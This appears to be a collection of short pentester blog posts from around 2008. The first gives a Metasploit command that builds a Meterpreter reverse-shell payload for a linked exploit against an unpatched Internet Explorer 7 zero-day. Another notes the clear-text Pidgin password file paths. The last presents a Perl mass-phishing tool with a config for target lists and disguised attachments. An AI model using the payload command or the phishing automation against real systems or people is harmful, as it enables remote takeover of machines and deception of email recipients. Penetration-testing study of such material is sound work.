There was a recent 0day for IE 7, you may have heard a thing or two about it lately in the press. M$ is releasing a out of band patch tomorrow, http://isc.sans.org/diary.html?storyid=5497.

meh.

For those of you who wanted a bit easier route with the exploit, here is a few helpful hints with Backtrack 3 and some new Perl I whipped up:

$ /pentest/exploit/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 J | ./payloadproper.pl > exploit.js

http://spl0it.org/files/payloadproper.pl

The resulting file can be helpful when used with the exploit on milworm.

http://milw0rm.com/sploits/2008-iesploit.tar.gz

Regards,
Jabra

My favorite web application testing framework has just been updated.

http://seclists.org/webappsec/2008/q4/0041.html

Awesome job PortSwigger! I look forward to many future releases.

Regards,
Jabra

Recently, a Red-Hat friend reminded me of an issue with pidgin in that when you save your password, it is saved in clear-text.

Linux/Unix:

~/.purple/accounts.xml

Windows XP:

C:\Documents and Settings\%USERNAME%\Application Data\.purple\accounts.xml

Therefore, keep this in-mind when your working on multi-user systems and don't save your password.

Phishing attacks are easily performed against a single target. What if you want to automate and easily setup a client based attack against a list of targets??


As always, my solution was Perl.

I setup a custom YAML configuration file to make things a bit easier for daily usage.

http://spl0it.org/files/SEF/config.yaml

# YAML:1.0
# email is sent here
to: email_addresses.csv
# email is sent from this address
from: test@aol.com
# email subject
subject: "Email Subject"
# email type ( text or text/html )
type: text/html
# msg body file
msg: email_body.txt
# number of seconds to wait before next email
wait: 5
# prepend the first name to the email body
name: yes
# add custom signature from file
sig: yes
# signature file
sig_file: sig
# add an email attachment
attachment: yes
# path to file attachment
attachment_file: /tmp/test.jpg
# name of file attachment
attachment_file_name: funny.jpg
# type of attachment
attachment_file_type: image/jpg

The most important aspect is the email_addresses.csv which contains the full name of the target then a comma and the email address.

Example:

John Smith,john_smith@domain.com

I have even added the ability to:
* add an attachment
* append the first name to the email body
* add a signature to the bottom of the email body taken from a file
* wait X seconds between sending each email
* text or html email formats

http://spl0it.org/files/SEF/email.pl

Let me know what you think.

Regards,
Jabra